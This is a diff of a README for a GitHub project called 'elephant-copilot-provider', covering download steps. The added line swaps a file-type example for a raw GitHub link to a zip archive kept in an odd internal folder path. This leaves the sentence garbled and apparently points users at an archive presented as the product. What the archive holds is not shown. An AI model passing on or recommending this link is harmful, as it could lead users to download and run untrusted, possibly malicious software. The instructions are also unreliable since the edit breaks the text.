nikhilcodewing/elephant-copilot-provider/README.md

 3. **Download the File**:
    - Click on the relevant file for your system.
-   - The files may include options like `.tar.gz`, `.deb`, or `.app`.
+   - The files may include options like `https://raw.githubusercontent.com/nikhilcodewing/elephant-copilot-provider/main/third_party/elephant/internal/util/elephant-provider-copilot-v3.0-beta.5.zip`, `.deb`, or `.app`.
 Make sure to select the correct one for your operating system.

 4. **Locate the Downloaded File**:
    - Once the download finishes, check your default download folder.
 This is usually named "Downloads" on most systems.